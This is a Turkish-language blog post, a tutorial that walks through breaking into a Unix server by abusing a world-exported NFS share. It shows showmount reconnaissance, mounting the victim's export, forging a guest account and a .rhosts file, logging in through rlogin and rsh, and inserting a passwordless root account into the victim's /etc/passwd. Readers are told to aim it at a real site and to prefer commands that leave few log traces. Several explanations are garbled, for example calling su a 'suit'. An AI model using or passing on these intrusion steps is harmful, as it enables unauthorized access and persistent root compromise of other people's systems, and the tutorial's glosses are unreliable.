BIR SISTEM HAKKINDA BILGI ALMANIN BASLICA YOLLARINDAN BIRI "finger" KOMUTUYDU."finger @hedef.com" BASLICA KULLANIM FORMU OLMAKLA BERABER, "flag" DENILEN PARAMETRELERLE KULLANIMI DA VARDIR.ORNEGIN:"finger -l hedef.com" GIBI.AYRINTILI PARAMETRE KULLANIM BILGISINI "man finger" YAZARAK OGRENIN VE PRATIK YAPIN.HEDEF SECTIGINIZ SITE GUVENLIK NEDENIYLE FINGER PORTUNU KAPATMISSA,SONUC HAYAL KIRIKLIGI OLACAKTIR.UNUTMAMAMIZ GEREKEN NOKTA,AZIMLE PISLEYEN TASI DELER ATASOZU OLUP,DIGER YONTEMLERE DOGRU YELKEN ACMAMIZ GEREGIDIR.SIRADAKI BILGI TOPLAMA VE AYNI ZAMANDA HACK ARACI OLAN "mount" VE "showmount" KOMUTLARIDIR.YONTEMIMIZIN SAKINCASI,ARACI OLARAK KULLANDIGIMIZ UNIX SERVERIN HER ZAMAN BU KOMUTLARA OLAMAYABILECEGIDIR.YILLIK BELLI BIR UCRET KARSILIGINDA,UNIX HIZMETINI KISITLAMA OLMADAN SUNAN SERVERLARI www.altavista.com ARAMA MOTORUNA UNIX YAZARAK BULABILIR VE ABONE OLABILIRSINIZ.VAMPIRINIZ FAKIR BIR DEVLET MEMURU OLDUGUNDAN,BU KOMUTLARI KULLANAMAYAN BEDAVA SITELERDEN IS BITIRMEKTE AMA SERVET DUSMANI OLMADIGINDAN DOLAYI DA PARALI KARDESLERIMIZIN KULLANABILECEGI HACK YONTEMLERINI DE ACIKLAMAKTA.KOLAY GELSIN....ONCELIKLE mount KOMUTUNU KISACA ANLATALIM.EKLE,YAPISTIR GIBI ANLAMLARA GELMEKTE.BIR UNIX SERVERINDA AYNI OZEL PC'NIZDE OLDUGU GIBI BIRDEN FAZLA DISK OLABILIR.BU DISKLER SISTEM AGI ICINDA mount KOMUTU ILE BIRLESTIRILIR.SISTEM ACILDIGINDA HANGI DISKIN VE HANGI PARTITISYONLARIN KULLANILACAGI YANI YUKLENECEGI,SISTEM YONETICISI TARAFINDAN CONFIGURE EDILIR.CONFIGURE ETMEK,AYARLAMAK ANLAMINDADIR.PARTITISYON ISE BOLUMLER ANLAMINA GELIR.BOLUMLER BIR DISKDE 3 PARCADIR.BUNLARIN BIRINCISI "/" YANI ANA KLASORDUR.IKINCISI user ADLI KLASOR OLUP,TUM KULLANICILARIN ORTAK GEREKSINIM DUYDUKLARI KOMUTLARI,PROGRAMLARI FILAN ICERIR.SON BOLUM ISE home DENILEN KULLANICILARIN BULUNDUGU BOLUMDUR.SISTEME BAGLANDIGINIZ ANDA ONCELIKLE "/" BOLUMU YUKLENIR.mount KOMUTU ILE BASKA BIR PARTITISYONU BU ANADISKE EKLEYEBILIR VEYA BASKA BIR DISKE ANADISKI EKLEYEBILIRSINIZ.showmount KOMUTU ISE UZAKTAKI SISTEMIN PARTITISYONLARINI GOSTERIR.BU BILGILER ISIGI ALTINDA HACK GIRISIMINE BASLAYALIM.HACKLEYECEGIMIZ SITE HAYALI KURBAN.COM'DUR.SIZ KENDI GERCEK SITE ADRESINI YAZIN."%" ISARETI ISE KULLANDIGIM SHELL'IN PROMPTU OLUP,SIZINKININ FARKLI OLMASININ BIR ONEMI YOK,KOMUTLARA EKLEME SALAKLIGINI GOSTERIP,HOCANIZI UZMEYIN LUTFEN.SIMDI IZLEYIN BAKALIM:
% showmount -e kurban.com
export list for kurban.com
/export (everyone)
/var (everyone)
/usr easy
export/exec/kvm/sun.4c.sunos.4.1.3 easy
/export/root/easy easy
/export/swap/easy easy
VAMPIRIN ARA NOTU:foo VARIABLES YANI DEGISKENLER ANLAMINDA KULLANILAN INTERNATIONAL BIR TERIMDIR.YUKARIDA GORDUGUNUZ UZERE export/foo YANI export VE TUM ALTI DIS DUNYAYA ACIKTIR.EXPORT AYNI ZAMANDA,KULLANICI GUEST OLARAK BIZIMDE HOME KLASORUMUZDUR.KENDI SISTEMIMIZDE BIR GUEST HESABI OLUSTURUP BUNU KARSI TARAFA YOLLAYACAGIZ.DAHA SONRA BU HESAP ALTINDA BIR rhosts DOSYASI YARATACAGIZ VE TEKRAR LOGIN OLDUGUMUZDA BIZI AILEDEN KABUL EDIP ICERI ALACAKLAR.SIMDI IZLEYIN:
mount kurban.com:/export/foo /foo (BU KOMUTLA KURBANIN EXPORT KLASORUNU BIZIM SERVERDA /foo KLASORUNE KOPYALA ANLAMINA GELIR)
cd /foo (foo KLASORUNE GIT DEMEKTIR)
ls -lga (HEPSINI EKRANA GONDER DEDIK VE SONUC:)
1 drwxr-xr-x 18 root daemon 347 mar 23 06.34 .
1 drwxr-xr-x 5 wheel daemon 465 jul 16 23.14 ..
1 drwxr--x--x 9 10004 daemon aug 3 12.45 guest
HEMEN TEKRAR KOMUT YAZIYORUZ LAVUKLARA:
echo guest:x:10004:1:gecici_hesap:/: >> /etc/passwd (GUEST HESABI YARATTIK)
ls -lga (ALALIM LISTEYI DEMEKTIR.YUKARIDAKI 3 KLASORDEN, UCUNCUSU SU SEKILDE DEGISMIS OLARAK EKRANA GELIR.)
1 drwx--x--x guest daemon aug 3 12.45 guest (YANI GUEST HESABI YARATMIS OLDUK KISACASI.10004 DEGIL GUEST YAZIYOR YUKARIDA,DIKKAT)
su guest (GUEST'E SU OZELLIGI YANI SUIT VERIYORUZ)
echo kurban.com >> guest/.rhosts (HESABIMIZIN ALTINA BIZI TANIYIP,SIFRESIZ ICERI ALMASINI SAGLAYACAK "rhosts" 'u GIZLI DOSYA OLARAK YERLESTIRDIK)
rlogin kurban.com (KURBAN.COM'A TEKRAR LOGIN OL DEDIK.VE CEVAP:)
WELLCOME KURBAN.COM
KURBAN %
YETTI MI BU KADARI?ELBETTE HAYIR.EVET KURBAN.COM'U HACKLEDINIZ AMA YUKARIDAKI SATIRDA GORDUGUNUZ GIBI PROMPTUNUZ UYUZ BIR SIRADAN SHELL ISARETI.YANI root OLAMADINIZ MAALESEF.OKEY,HAYDI OLALIM VE ZAFERI TACLANDIRALIM:
% rsh kurban.com csh -i (SISTEME GIRERKEN PEK KAYIT IZI BIRAKMAYAN BIR KOMUTTUR.TAVSIYE OLUNUR.
KURBAN % ls -ldg /etc
drwxr-sr-x 12 bin bokpusur 1254 jul 31 05.12 /etc
kurban % mv passwd pw.old
(echo vampir::0:1:anýnda_goruntu_baba:/:/bin/sh; cat pw.old ) > passwd
kurban % ^D (BU KOMUT BAGLANTIMIZI KOPARIR)
% rlogin kurban.com -l vampir
kurban # (ARTIK root'SUNUZ.TEBRIKLER)
0 yorum:
Yorum Gönder